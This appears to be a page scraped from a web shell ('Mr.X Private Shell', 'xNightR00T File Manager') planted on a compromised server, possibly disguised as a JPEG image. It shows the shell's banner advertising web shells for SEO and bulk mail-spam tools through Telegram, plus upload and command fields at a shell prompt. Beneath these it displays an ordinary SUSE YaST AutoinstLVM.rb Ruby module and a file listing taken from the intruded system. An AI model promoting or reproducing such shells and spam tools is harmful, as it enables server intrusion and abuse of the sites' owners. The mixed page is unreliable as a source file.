xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# File:    modules/AutoinstLVM.ycp
# Module:    Auto-Installation
# Summary:    LVM
# Authors:    Anas Nashif <nashif@suse.de>

require "yast"

module Yast
  class AutoinstLVMClass < Module

    include Yast::Logger

    # Report shrinking if it will be bigger than about 20 MBytes.
    REPORT_DISK_SHRINKING_LIMIT = 20000

    def main
      textdomain "autoinst"

      Yast.import "Storage"
      Yast.import "Report"
      Yast.import "Partitions"
      Yast.import "FileSystems"
      Yast.import "AutoinstStorage"
      Yast.import "Label"

      Yast.include self, "partitioning/lvm_lv_lib.rb"


      @ExistingLVM = {}

      @ExistingVGs = []

      @keepLVM = {}

      # LVM map as imported from Profile
      @lvm = {}


      # useless
      #    boolean pvs_on_unconfigured = false;


      # temporary copy of variable from Storage
      # map <string, map> targetMap = $[];

      # temporary copy of variable from Storage
      @targetMap = {}

      @old_available = false
      AutoinstLVM()
    end

    # Constructer
    def AutoinstLVM
      nil
    end


    # Initialize
    # @return [void]
    def Init
      Builtins.y2milestone("entering Init")
      Builtins.y2milestone("AutoTargetMap is %1", AutoinstStorage.AutoTargetMap)
      @lvm = Builtins.filter(AutoinstStorage.AutoTargetMap) do |k, v|
        Ops.get_symbol(v, "type", :CT_UNKNOWN) == :CT_LVM
      end

      # check for existing VM
      @targetMap = Storage.GetTargetMap
      Builtins.y2milestone("GetTargetMap returns %1", @targetMap)
      @ExistingLVM = Builtins.filter(Storage.GetTargetMap) do |k, v|
        Ops.get_symbol(v, "type", :CT_UNKNOWN) == :CT_LVM
      end
      if Builtins.haskey(@ExistingLVM, "/dev/evms")
        @ExistingLVM = Builtins.remove(@ExistingLVM, "/dev/evms")
      end
      @ExistingVGs = Builtins.maplist(@ExistingLVM) do |d, g|
        Builtins.substring(d, 5)
      end

      # we say keep all LVs where the keep_unknown_lv is set
      Builtins.foreach(@ExistingLVM) do |k, v|
        vgname = Ops.get_string(v, "name", "")
        Builtins.foreach(Ops.get_list(v, "partitions", [])) do |p|
          if Ops.get_boolean(
              @lvm,
              [Ops.add("/dev/", vgname), "keep_unknown_lv"],
              false
            ) == true
            Ops.set(
              @keepLVM,
              vgname,
              Builtins.add(
                Ops.get(@keepLVM, vgname, []),
                Ops.get_string(p, "lv_name", "")
              )
            )
          end
        end
      end

      # look for VGs to reuse
      Builtins.foreach(AutoinstStorage.AutoTargetMap) do |k, v|
        Builtins.foreach(Ops.get_list(v, "partitions", [])) do |p|
          if Builtins.haskey(p, "lvm_group") &&
              Ops.get_boolean(p, "create", true) == false &&
              Ops.get_boolean(p, "format", true) == false
            if !Builtins.contains(
                @ExistingVGs,
                Ops.get_string(p, "lvm_group", "x")
              )
              Report.Error(
                Builtins.sformat(
                  _(
                    "Cannot reuse volume group %1. The volume group does not exist."
                  ),
                  Ops.get_string(p, "lvm_group", "x")
                )
              )
            end
            atm = deep_copy(AutoinstStorage.AutoTargetMap)
            Builtins.foreach(
              Ops.get_list(
                atm,
                [
                  Ops.add("/dev/", Ops.get_string(p, "lvm_group", "x")),
                  "partitions"
                ],
                []
              )
            ) do |vg_p|
              lvm_group = Ops.get_string(p, "lvm_group", "x")
              # we know the LV now. So remove it from the keep-list for now
              Ops.set(
                @keepLVM,
                lvm_group,
                Builtins.filter(Ops.get(@keepLVM, lvm_group, [])) do |v2|
                  v2 != Ops.get_string(vg_p, "lv_name", "")
                end
              )
              if Ops.get_boolean(vg_p, "create", true) == false
                Ops.set(
                  @keepLVM,
                  lvm_group,
                  Builtins.add(
                    Ops.get(@keepLVM, lvm_group, []),
                    Ops.get_string(vg_p, "lv_name", "")
                  )
                )
              end
            end
          end
        end
      end

      Builtins.y2milestone("Existing VGs: %1", @ExistingVGs)
      Builtins.y2milestone("Existing LVM: %1", @ExistingLVM)
      Builtins.y2milestone("keep LVM: %1", @keepLVM)

      # FIXME
      Builtins.foreach(@ExistingVGs) do |v|
        dev = Builtins.sformat("/dev/%1", v)
        if Ops.greater_than(
            Builtins.size(Ops.get_list(@ExistingLVM, [dev, "partitions"], [])),
            0
          )
          @old_available = true
        end
      end


      # Process data
      @lvm = Builtins.mapmap(@lvm) do |device, disk|
        Ops.set(
          disk,
          "pesize",
          AutoinstStorage.humanStringToByte(
            Ops.get_string(disk, "pesize", "4M"),
            true
          )
        )
        vgname = Builtins.substring(device, 5)
        Ops.set(
          disk,
          "partitions",
          Builtins.maplist(Ops.get_list(disk, "partitions", [])) do |lv|
            lvsize_str = Ops.get_string(lv, "size", "")
            mount_point = Ops.get_string(lv, "mount", "")
            lvsize = 0
            vgsize = Ops.multiply(
              Ops.get_integer(@targetMap, [device, "size_k"], 0),
              1024
            )
            if (lvsize_str == "auto" || lvsize_str == "suspend") &&
                mount_point == "swap"
              Builtins.y2milestone(
                "swap slot size: %1",
                Ops.multiply(Ops.divide(vgsize, 1024), 1024)
              )
              lvsize = Ops.multiply(
                1024 * 1024,
                Partitions.SwapSizeMb(
                  Ops.divide(vgsize, 1024 * 1024),
                  lvsize_str == "suspend"
                )
              )
            elsif lvsize_str != ""
              lvsize = AutoinstStorage.humanStringToByte(lvsize_str, true)
            end
            Ops.set(lv, "size_k", Ops.divide(lvsize, 1024))
            Ops.set(lv, "type", :lvm)
            Ops.set(lv, "name", Ops.get_string(lv, "lv_name", ""))
            deep_copy(lv)
          end
        )
        { device => disk }
      end

      true
    end

    # Delete possible partitions
    def remove_possible_volumes(vgname)
      Builtins.y2milestone("Deleting possible VGs and LVs")
      return true if @ExistingLVM == {}

      vg = Ops.get(@ExistingLVM, Ops.add("/dev/", vgname), {})
      lvs = Ops.get_list(vg, "partitions", [])
      Builtins.y2milestone("Existing LVs: %1", lvs)

      Builtins.foreach(lvs) do |lv|
        if !Builtins.contains(
            Ops.get(@keepLVM, vgname, []),
            Ops.get_string(lv, "name", "")
          )
          Storage.DeleteDevice(
            Ops.add(
              Ops.add(Ops.add("/dev/", vgname), "/"),
              Ops.get_string(lv, "name", "")
            )
          )
        end
      end

      if !Builtins.haskey(@keepLVM, vgname) &&
          Ops.get(@ExistingLVM, Ops.add("/dev/", vgname), {}) != {}
        Storage.DeleteLvmVg(vgname)
      end

      true
    end

    # Return only those PVs on disks touched by the control file, dont add PVs of
    # unconfigured disks.
    # @param string volume group name
    # @return [Array] existing PVs
    def get_existing_pvs(vgname)
      Builtins.y2milestone("entering get_existing_pvs with %1", vgname)

      usedBy = :UB_LVM

      # all possible PVs on all available devices
      all_possible_pvs = Builtins.filter(get_possible_pvs(Storage.GetTargetMap)) do |part|
        (Ops.get_string(part, "used_by_device", "") == Ops.add("/dev/", vgname) &&
          Ops.get_symbol(part, "used_by_type", :UB_NONE) == usedBy ||
          Ops.get_symbol(part, "used_by_type", :UB_NONE) == :UB_NONE) &&
          !Ops.get_boolean(part, "delete", false)
      end

      Builtins.y2milestone("all pvs= %1", all_possible_pvs)

      # FIXME
      deep_copy(all_possible_pvs)
    end

    # Write LVM Configuration
    # @return [Boolean] true on success
    def Write
      Builtins.y2milestone("entering Write")
      Storage.SetZeroNewPartitions(AutoinstStorage.ZeroNewPartitions)

      lvm_vgs = get_vgs(@targetMap)
      current_vg = ""

      error = false

      Builtins.foreach(@lvm) do |device, volume_group|
        Builtins.y2milestone("volume_group is %1", volume_group)
        use = Ops.get_string(volume_group, "use", "none")
        lvm2 = Ops.get_boolean(volume_group, "lvm2", true)
        lvm_string = lvm2 ? "lvm2" : "lvm"
        vgname = Builtins.substring(device, 5)
        current_vg = vgname
        new_pvs = get_existing_pvs(vgname)
        pesize = Ops.get_integer(volume_group, "pesize", 1)
        if Ops.get_boolean(volume_group, "prefer_remove", false)
          remove_possible_volumes(vgname)
        end
        if Builtins.size(Ops.get_list(volume_group, "keep_lv", [])) == 0
          ret = Storage.CreateLvmVg(
            vgname,
            Ops.get_integer(volume_group, "pesize", 4194304),
            lvm2
          )
          current_vg = vgname
          Builtins.y2milestone("CreateLvmVg returns %1", ret)
          @targetMap = Storage.GetTargetMap
          Builtins.y2milestone("Storage::GetTargetMap returns %1", @targetMap)
          lvm_vgs = get_vgs(@targetMap)
        end
        new_pvs_devices = Builtins.maplist(new_pvs) do |pv|
          Ops.get_string(pv, "device", "")
        end
        Builtins.y2milestone("Existing PVs: %1", new_pvs)
        atm = deep_copy(AutoinstStorage.AutoTargetMap)
        smallest_physical = 0
        Builtins.foreach(new_pvs) do |pv|
          to_add = false
          if Ops.get_boolean(pv, "create", false)
            to_add = true
            # exclude partitions that are NOT supposed to be in the LVM
            Builtins.foreach(
              Ops.get_list(
                atm,
                [Ops.get_string(pv, "maindev", ""), "partitions"],
                []
              )
            ) do |atm_vol|
              if Ops.get_integer(pv, "nr", 0) ==
                  Ops.get_integer(atm_vol, "partition_nr", -1)
                if Ops.get_string(atm_vol, "lvm_group", "") != current_vg
                  Builtins.y2milestone("do not add %1", atm_vol)
                  to_add = false
                end
              end
            end
          else
            to_add = false
            # exclude partitions that are NOT supposed to be in the LVM
            Builtins.foreach(
              Ops.get_list(
                atm,
                [Ops.get_string(pv, "maindev", ""), "partitions"],
                []
              )
            ) do |atm_vol|
              if Ops.get_integer(pv, "nr", 0) ==
                  Ops.get_integer(atm_vol, "partition_nr", -1)
                if Ops.get_string(atm_vol, "lvm_group", "") == current_vg
                  Builtins.y2milestone("add %1", atm_vol)
                  to_add = true
                end
              end
            end
          end
          if to_add
            Builtins.y2milestone(
              "addPhysicalVolume %1 , %2",
              Ops.get_string(pv, "device", ""),
              current_vg
            )
            if smallest_physical == 0 ||
                Ops.less_than(
                  Ops.get_integer(pv, "size_k", 0),
                  smallest_physical
                )
              smallest_physical = Ops.get_integer(pv, "size_k", 0)
            end
            addPhysicalVolume(
              @targetMap,
              Ops.get_string(pv, "device", ""),
              current_vg
            )
          end
        end
        # calculating the "max" for logical volume
        tmp_tm = Storage.GetTargetMap
        freeSpace = 0
        buffer = 0
        freeSpace = Ops.get_integer(tmp_tm, [device, "size_k"], 0)
        buffer = Ops.get_integer(tmp_tm, [device, "cyl_size"], 0)
        buffer = Ops.divide(Ops.multiply(buffer, 2), 1024)
        max_counter = 0
        Ops.set(
          volume_group,
          "partitions",
          Builtins.maplist(Ops.get_list(volume_group, "partitions", [])) do |lv|
            s = AutoinstStorage.humanStringToByte(
              Ops.get_string(lv, "size", "10000"),
              true
            )
            if Ops.less_or_equal(s, 100) && Ops.greater_than(s, 0)
              # we assume percentage for this lv
              integer_k = Ops.divide(
                Ops.multiply(
                  freeSpace,
                  Builtins.tointeger(Ops.get_string(lv, "size", "0"))
                ),
                100
              )
              Ops.set(lv, "size_k", integer_k)
              Builtins.y2milestone(
                "percentage for lv %1. Size_k is %2",
                lv,
                integer_k
              )
            elsif (Ops.get_string(lv, "size", "") == "max" || Ops.get_string(lv, "size", "") == "auto") &&
                Ops.less_or_equal(Ops.get_integer(lv, "stripes", 0), 1)
              # "auto" size does not make sense here. But we are switching to the "max" behaviour in order
              # not to produce an error and to evaluate other useable settings. (bnc#962034)
              Report.Warning( "Option \"auto\" is not supported with LVM. Taking \"max\" option instead.") if lv["size"] == "auto"
              max_counter = Ops.add(max_counter, 1)
            end
            deep_copy(lv)
          end
        )
        partitions = []
        Builtins.foreach(Ops.get_list(volume_group, "partitions", [])) do |lv|
          freeSpace = substract_lv_size(freeSpace, lv)
          Builtins.y2milestone("freeSpace = %1", freeSpace)
          partitions << lv
        end
        volume_group["partitions"] = partitions
        freeSpace = Ops.subtract(freeSpace, buffer) # that's a buffer for rounding errors with cylinder boundaries
        Builtins.foreach(Ops.get_list(volume_group, "partitions", [])) do |lv|
          if Ops.get_integer(lv, "size_k", 0) == 0 &&
              Ops.greater_than(freeSpace, 0)
            # if "max" calculation is turned on for the LV
            if Ops.greater_than(Ops.get_integer(lv, "stripes", 0), 1)
              Ops.set(
                lv,
                "size_k",
                Ops.multiply(
                  smallest_physical,
                  Ops.get_integer(lv, "stripes", 1)
                )
              )
              Ops.set(
                lv,
                "size",
                Builtins.sformat(
                  "%1K",
                  Ops.multiply(
                    smallest_physical,
                    Ops.get_integer(lv, "stripes", 1)
                  )
                )
              )
              freeSpace = Ops.subtract(
                freeSpace,
                Ops.get_integer(lv, "size_k", 0)
              )
              smallest_physical = 0
              Builtins.y2milestone(
                "max-config for striped LV found. Setting size to %1",
                Ops.get_string(lv, "size", "0")
              )
            else
              Ops.set(lv, "size_k", Ops.divide(freeSpace, max_counter))
              Ops.set(lv, "size", Builtins.sformat("%1K", freeSpace))
            end
          end
          Builtins.y2milestone(
            "size_k before rounding %1",
            Ops.get_integer(lv, "size_k", 0)
          )
          Ops.set(
            lv,
            "size_k",
            Ops.divide(
              Ops.multiply(
                Ops.divide(
                  Ops.multiply(Ops.get_integer(lv, "size_k", 0), 1024),
                  pesize
                ),
                pesize
              ),
              1024
            )
          ) # rounding
          Builtins.y2milestone(
            "size_k after rounding %1",
            Ops.get_integer(lv, "size_k", 0)
          )
          lvlist = Ops.get_list(@ExistingLVM, [device, "partitions"], [])
          if Builtins.contains(
              Ops.get(@keepLVM, vgname, []),
              Ops.get_string(lv, "lv_name", "")
            )
            lvtokeep = Builtins.filter(lvlist) do |p|
              Ops.get_string(p, "nr", "") == Ops.get_string(lv, "lv_name", "")
            end
            this_lv = Ops.get(lvtokeep, 0, {})

            Builtins.y2milestone("Keeping LV: %1", this_lv)
            Builtins.y2milestone("lv = %1", lv)

            Ops.set(
              lv,
              "device",
              Ops.add(
                Ops.add(Ops.add("/dev/", vgname), "/"),
                Ops.get_string(lv, "lv_name", "")
              )
            )
            Ops.set(lv, "used_fs", Ops.get_symbol(this_lv, "used_fs") do
              Partitions.DefaultFs
            end)

            lvret = {}
            if Ops.get_boolean(lv, "resize", false)
              reslv = {
                "create"  => false,
                "region"  => Ops.get_list(lv, "region", []),
                "fsid"    => 142,
                "lv_size" => Ops.get_integer(lv, "lv_size", 0),
                "fstype"  => "LV",
                "nr"      => Ops.get_string(lv, "nr", ""),
                "mount"   => Ops.get_string(lv, "mount", ""),
                "used_fs" => Ops.get_symbol(this_lv, "used_fs") do
                  Partitions.DefaultFs
                end,
                "format"  => Ops.get_boolean(lv, "format", false),
                "device"  => Ops.get_string(lv, "device", "")
              }
              Ops.set(reslv, "changed_size", true)
              Storage.ResizeVolume(
                Ops.add(
                  Ops.add(Ops.add("/dev/", current_vg), "/"),
                  Ops.get_string(lv, "name", "")
                ),
                Ops.add("/dev/", current_vg),
                Ops.divide(Ops.get_integer(lv, "lv_size", 0), 1024)
              )
            else
              Storage.ChangeVolumeProperties(lv)
            end
            @targetMap = Convert.convert(
              Ops.get(lvret, "targets", @targetMap),
              :from => "any",
              :to   => "map <string, map>"
            )
          elsif Ops.get_boolean(lv, "create", true)
            Ops.set(lv, "used_fs", Ops.get_symbol(lv, "filesystem") do
              Partitions.DefaultFs
            end)
            lv = AutoinstStorage.AddFilesysData(lv, lv)
            Ops.set(lv, "create", true)
            Ops.set(lv, "format", Ops.get_boolean(lv, "format", true))
            Ops.set(
              lv,
              "device",
              Ops.add(
                Ops.add(Ops.add("/dev/", current_vg), "/"),
                Ops.get_string(lv, "name", "")
              )
            )
            Builtins.y2milestone(
              "calling addLogicalVolume with lv = %1 and current_vg = %2",
              lv,
              current_vg
            )
            addLogicalVolume(lv, current_vg)
            @targetMap = Storage.GetTargetMap
            Builtins.y2milestone("Storage::GetTargetMap returns %1", @targetMap)
          end
        end
      end
      Builtins.y2milestone("targetmap: %1", @targetMap)

      AutoinstStorage.AutoTargetMap.each do |device, data|
        target_map = Storage.GetTargetMap()
        if target_map.has_key?(device) && data["type"] == :CT_LVM
          if data["enable_snapshots"] && target_map[device].has_key?("partitions")
            root_partition = target_map[device]["partitions"].find do
              |p| p["mount"] == "/" && p["used_fs"] == :btrfs
            end
            if root_partition
              log.info("Enabling snapshots for \"/\"; root_partition #{root_partition}")
              Storage.SetUserdata(root_partition["device"], { "/" => "snapshots" })
            end
          end
        end
      end

      true
    end

    publish :variable => :ExistingLVM, :type => "map <string, map>"
    publish :variable => :ExistingVGs, :type => "list <string>"
    publish :variable => :keepLVM, :type => "map <string, list <string>>"
    publish :variable => :lvm, :type => "map <string, map>"
    publish :function => :AutoinstLVM, :type => "void ()"
    publish :function => :Init, :type => "boolean ()"
    publish :function => :get_existing_pvs, :type => "list <map> (string)"
    publish :function => :Write, :type => "boolean ()"

    private

    # Substracts from the existing space the amount needed to accommodate the
    # given logical volume, reducing the size of that LV if it doesn't fit into
    # the initial space.
    #
    # @note This method can modify the second passed argument, unless the
    #   logical volume fits on the space or it's a thin volume.
    #
    # @param freeSpace [Integer] space available originally
    # @param lv [Hash] logical volume, the field 'size_k' of this argument will
    #   be modified if needed
    # @return [Integer] resulting available space
    def substract_lv_size(freeSpace, lv)
      # See bug#1148918
      if lv["used_pool"] && !lv["used_pool"].empty?
        log.info "Size of thin logical volume on #{lv['mount']} will be ignored."
        return freeSpace
      end

      size_k = lv.fetch("size_k", 0)
      # With RAID systems freeSpace is 0. So a resize is not needed/possible here.
      if (freeSpace > 0 && size_k > freeSpace)
        lv["size_k"] = freeSpace
        Builtins.y2milestone("Requested partition size of %s on \"%s\" will be reduced to "\
          "%s in order to fit on disk." % [size_k, lv["mount"], freeSpace])

        if (size_k - freeSpace) > REPORT_DISK_SHRINKING_LIMIT
          Report.Warning(_("Requested partition size of %s on \"%s\" will be reduced to "\
            "%s in order to fit on disk.") %
            [Storage.KByteToHumanString(size_k), lv["mount"], Storage.KByteToHumanString(freeSpace)])
        end
      end

      Ops.subtract(freeSpace, Ops.get_integer(lv, "size_k", 0))
    end
  end

  AutoinstLVM = AutoinstLVMClass.new
  AutoinstLVM.main
end

Filemanager

Name Type Size Permission Actions
YaPI Folder 0755
YaST Folder 0755
ALog.rb File 3.26 KB 0644
AddOnProduct.rb File 78.59 KB 0644
Address.rb File 3.45 KB 0644
Arch.rb File 15.59 KB 0644
AsciiFile.rb File 12.59 KB 0644
Assert.rb File 2.06 KB 0644
AuditLaf.rb File 21.16 KB 0644
AuthServer.pm File 172.86 KB 0644
AutoInstall.rb File 11.34 KB 0644
AutoInstallRules.rb File 36.37 KB 0644
AutoinstClass.rb File 7.62 KB 0644
AutoinstClone.rb File 6.82 KB 0644
AutoinstCommon.rb File 3.18 KB 0644
AutoinstConfig.rb File 17.86 KB 0644
AutoinstData.rb File 2.37 KB 0644
AutoinstDrive.rb File 14.28 KB 0644
AutoinstFile.rb File 9.3 KB 0644
AutoinstFunctions.rb File 1.1 KB 0644
AutoinstGeneral.rb File 17.48 KB 0644
AutoinstImage.rb File 1.75 KB 0644
AutoinstLVM.rb File 21.58 KB 0644
AutoinstPartPlan.rb File 36.37 KB 0644
AutoinstPartition.rb File 14.53 KB 0644
AutoinstRAID.rb File 7.73 KB 0644
AutoinstScripts.rb File 36.75 KB 0644
AutoinstSoftware.rb File 38.57 KB 0644
AutoinstStorage.rb File 48.62 KB 0644
Autologin.rb File 4.82 KB 0644
BootArch.rb File 3.37 KB 0644
BootStorage.rb File 10.15 KB 0644
BootSupportCheck.rb File 7.36 KB 0644
Bootloader.rb File 15.87 KB 0644
CWM.rb File 39.16 KB 0644
CWMFirewallInterfaces.rb File 38.92 KB 0644
CWMServiceStart.rb File 27.49 KB 0644
CWMTab.rb File 13.2 KB 0644
CWMTable.rb File 14.57 KB 0644
CWMTsigKeys.rb File 24.93 KB 0644
CaMgm.rb File 12.9 KB 0644
Call.rb File 1.53 KB 0644
CheckMedia.rb File 6.1 KB 0644
CommandLine.rb File 52.89 KB 0644
Confirm.rb File 6.95 KB 0644
Console.rb File 8.63 KB 0644
ContextMenu.rb File 1.4 KB 0644
Crash.rb File 5.26 KB 0644
Cron.rb File 2.85 KB 0644
CustomDialogs.rb File 2.52 KB 0644
DNS.rb File 23.77 KB 0644
DebugHooks.rb File 4.89 KB 0644
DefaultDesktop.rb File 13.29 KB 0644
Desktop.rb File 12.5 KB 0644
DevicesSelectionBox.rb File 5.67 KB 0644
DhcpServer.pm File 70.43 KB 0644
DhcpServerUI.rb File 10.43 KB 0644
DialogTree.rb File 11.76 KB 0644
Directory.rb File 4.99 KB 0644
Distro.rb File 2.29 KB 0644
DnsData.pm File 1.65 KB 0644
DnsFakeTabs.rb File 751 B 0644
DnsRoutines.pm File 2.81 KB 0644
DnsServer.pm File 57.26 KB 0644
DnsServerAPI.pm File 68.81 KB 0644
DnsServerHelperFunctions.rb File 11.83 KB 0644
DnsServerUI.rb File 3.78 KB 0644
DnsTsigKeys.pm File 2.53 KB 0644
DnsZones.pm File 22.9 KB 0644
DontShowAgain.rb File 13.03 KB 0644
DualMultiSelectionBox.rb File 24.91 KB 0644
Encoding.rb File 4.54 KB 0644
Event.rb File 4.89 KB 0644
FTP.rb File 2.32 KB 0644
FileChanges.rb File 9.39 KB 0644
FileSystems.rb File 69.86 KB 0644
FileUtils.rb File 17.64 KB 0644
FtpServer.rb File 36.4 KB 0644
GPG.rb File 13.58 KB 0644
GPGWidgets.rb File 12.34 KB 0644
GetInstArgs.rb File 4.04 KB 0644
Greasemonkey.rb File 6.86 KB 0644
HTML.rb File 6.11 KB 0644
HTTP.rb File 3.37 KB 0644
HWConfig.rb File 5.1 KB 0644
Hooks.rb File 5.76 KB 0644
Host.rb File 10.78 KB 0644
Hostname.rb File 7.35 KB 0644
Hotplug.rb File 5.64 KB 0644
HttpServer.rb File 26.81 KB 0644
HttpServerWidgets.rb File 120.87 KB 0644
HwStatus.rb File 3.08 KB 0644
IP.rb File 12.65 KB 0644
IPSecConf.rb File 22.58 KB 0644
Icon.rb File 5.43 KB 0644
ImageInstallation.rb File 49.56 KB 0644
Inetd.rb File 28.29 KB 0644
Initrd.rb File 16.41 KB 0644
InstData.rb File 4.13 KB 0644
InstError.rb File 6.95 KB 0644
InstExtensionImage.rb File 15.48 KB 0644
InstFunctions.rb File 5.12 KB 0644
InstShowInfo.rb File 2.81 KB 0644
InstURL.rb File 6.06 KB 0644
Installation.rb File 10.29 KB 0644
Instserver.rb File 43.86 KB 0644
Integer.rb File 2.99 KB 0644
Internet.rb File 9.29 KB 0644
IscsiClient.rb File 9.74 KB 0644
IscsiClientLib.rb File 55.9 KB 0644
IsnsServer.rb File 11.07 KB 0644
Kdump.rb File 38.8 KB 0644
Kerberos.rb File 37.03 KB 0644
Kernel.rb File 22.96 KB 0644
KeyManager.rb File 8.47 KB 0644
Keyboard.rb File 50.48 KB 0644
Kickstart.rb File 23.84 KB 0644
Label.rb File 9.11 KB 0644
Lan.rb File 32.38 KB 0644
LanItems.rb File 94.36 KB 0644
Language.rb File 45.33 KB 0644
Ldap.rb File 63.96 KB 0644
LdapDatabase.rb File 77.2 KB 0644
LdapPopup.rb File 21.03 KB 0644
LdapServerAccess.pm File 8.73 KB 0644
Linuxrc.rb File 7.53 KB 0644
LogView.rb File 21.39 KB 0644
LogViewCore.rb File 6.32 KB 0644
Mail.rb File 43.92 KB 0644
MailAliases.rb File 6.88 KB 0644
MailTable.pm File 3.25 KB 0644
MailTableInclude.pm File 4.79 KB 0644
Map.rb File 4.27 KB 0644
Message.rb File 11.39 KB 0644
MiniWorkflow.rb File 2.88 KB 0644
Misc.rb File 11.8 KB 0644
Mode.rb File 10.76 KB 0644
ModuleLoading.rb File 9.26 KB 0644
ModulesConf.rb File 4.24 KB 0644
Mtab.rb File 1.24 KB 0644
NetHwDetection.rb File 8.46 KB 0644
Netmask.rb File 5.08 KB 0644
Network.rb File 1.3 KB 0644
NetworkConfig.rb File 5.9 KB 0644
NetworkInterfaces.rb File 56.49 KB 0644
NetworkPopup.rb File 7.86 KB 0644
NetworkService.rb File 12.71 KB 0644
NetworkStorage.rb File 1.91 KB 0644
Nfs.rb File 22.35 KB 0644
NfsOptions.rb File 5.63 KB 0644
NfsServer.rb File 10.64 KB 0644
Nis.rb File 42.75 KB 0644
NisServer.rb File 39.93 KB 0644
Nsswitch.rb File 3.6 KB 0644
NtpClient.rb File 46.6 KB 0644
OSRelease.rb File 3.68 KB 0644
OneClickInstall.rb File 28.86 KB 0644
OneClickInstallStandard.rb File 4.35 KB 0644
OneClickInstallWidgets.rb File 16.54 KB 0644
OneClickInstallWorkerFunctions.rb File 10.6 KB 0644
OneClickInstallWorkerResponse.rb File 5.63 KB 0644
OnlineUpdate.rb File 4.04 KB 0644
OnlineUpdateCallbacks.rb File 19.62 KB 0644
OnlineUpdateDialogs.rb File 16.85 KB 0644
Package.rb File 7.78 KB 0644
PackageAI.rb File 5.03 KB 0644
PackageCallbacks.rb File 87.95 KB 0644
PackageCallbacksInit.rb File 2.12 KB 0644
PackageInstallation.rb File 8.49 KB 0644
PackageKit.rb File 2.67 KB 0644
PackageLock.rb File 6.77 KB 0644
PackageSlideShow.rb File 42.52 KB 0644
PackageSystem.rb File 16.87 KB 0644
Packages.rb File 94.3 KB 0644
PackagesProposal.rb File 11.79 KB 0644
PackagesUI.rb File 24.29 KB 0644
Pam.rb File 3.73 KB 0644
Partitions.rb File 33.23 KB 0644
Popup.rb File 57.78 KB 0644
PortAliases.rb File 10.47 KB 0644
PortRanges.rb File 22.92 KB 0644
Printer.rb File 112.82 KB 0644
Printerlib.rb File 31.82 KB 0644
Product.rb File 8.9 KB 0644
ProductControl.rb File 52.95 KB 0644
ProductFeatures.rb File 12.23 KB 0644
ProductLicense.rb File 50.23 KB 0644
ProductProfile.rb File 8.01 KB 0644
Profile.rb File 29.95 KB 0644
ProfileLocation.rb File 9.45 KB 0644
Progress.rb File 28.17 KB 0644
Proxy.rb File 15.65 KB 0644
Punycode.rb File 11.81 KB 0644
Region.rb File 1.82 KB 0644
RelocationServer.rb File 14.65 KB 0644
Remote.rb File 10.42 KB 0644
Report.rb File 25.13 KB 0644
RichText.rb File 4.01 KB 0644
RootPart.rb File 71.9 KB 0644
Routing.rb File 17.25 KB 0644
SLP.rb File 7.06 KB 0644
SLPAPI.pm File 879 B 0644
SSHAuthorizedKeys.rb File 3.74 KB 0644
SUSERelease.rb File 2.82 KB 0644
Samba.rb File 38.14 KB 0644
SambaAD.pm File 12.46 KB 0644
SambaConfig.pm File 37.4 KB 0644
SambaNetJoin.pm File 13.14 KB 0644
SambaNmbLookup.pm File 6.58 KB 0644
SambaWinbind.pm File 5.33 KB 0644
Security.rb File 27.79 KB 0644
Sequencer.rb File 12.6 KB 0644
Service.rb File 15.66 KB 0644
ServicesProposal.rb File 2.37 KB 0644
SignatureCheckCallbacks.rb File 11.1 KB 0644
SignatureCheckDialogs.rb File 36.74 KB 0644
SlideShow.rb File 33.27 KB 0644
SlideShowCallbacks.rb File 21.04 KB 0644
Slides.rb File 7.56 KB 0644
SlpService.rb File 5.37 KB 0644
Snapper.rb File 16.93 KB 0644
SnapperDbus.rb File 6.73 KB 0644
SourceDialogs.rb File 83.88 KB 0644
SourceManager.rb File 25.54 KB 0644
SourceManagerSLP.rb File 18.66 KB 0644
SpaceCalculation.rb File 35.03 KB 0644
Squid.rb File 51.25 KB 0644
SquidACL.rb File 16.84 KB 0644
SquidErrorMessages.rb File 5.59 KB 0644
Stage.rb File 3.6 KB 0644
Storage.rb File 234.29 KB 0644
StorageClients.rb File 6.68 KB 0644
StorageControllers.rb File 13.47 KB 0644
StorageDevices.rb File 19.86 KB 0644
StorageFields.rb File 45.67 KB 0644
StorageIcons.rb File 3.18 KB 0644
StorageInit.rb File 3.62 KB 0644
StorageProposal.rb File 222.63 KB 0644
StorageSettings.rb File 6.33 KB 0644
StorageSnapper.rb File 3.96 KB 0644
StorageUpdate.rb File 24.13 KB 0644
String.rb File 30.46 KB 0644
SuSEFirewall.rb File 1.29 KB 0644
SuSEFirewall4Network.rb File 12.24 KB 0644
SuSEFirewallCMDLine.rb File 53.73 KB 0644
SuSEFirewallExpertRules.rb File 13.11 KB 0644
SuSEFirewallProposal.rb File 25.99 KB 0644
SuSEFirewallServices.rb File 2.87 KB 0644
SuSEFirewallUI.rb File 2 KB 0644
Sudo.rb File 18.06 KB 0644
Summary.rb File 6.22 KB 0644
Support.rb File 14.83 KB 0644
Sysconfig.rb File 39.21 KB 0644
SystemFilesCopy.rb File 16.27 KB 0644
Systemd.rb File 4.88 KB 0644
TFTP.rb File 2.08 KB 0644
TabPanel.rb File 4.36 KB 0644
TablePopup.rb File 34.41 KB 0644
TftpServer.rb File 10.72 KB 0644
Timezone.rb File 35.64 KB 0644
TreePanel.rb File 5.24 KB 0644
TypeRepository.rb File 5.03 KB 0644
UIHelper.rb File 5.56 KB 0644
URL.rb File 22.61 KB 0644
URLRecode.rb File 1.88 KB 0644
Update.rb File 33.73 KB 0644
UserSettings.rb File 3.41 KB 0644
Users.pm File 193.07 KB 0644
UsersCache.pm File 32.48 KB 0644
UsersLDAP.pm File 51.51 KB 0644
UsersPasswd.pm File 24.75 KB 0644
UsersPluginKerberos.pm File 7.22 KB 0644
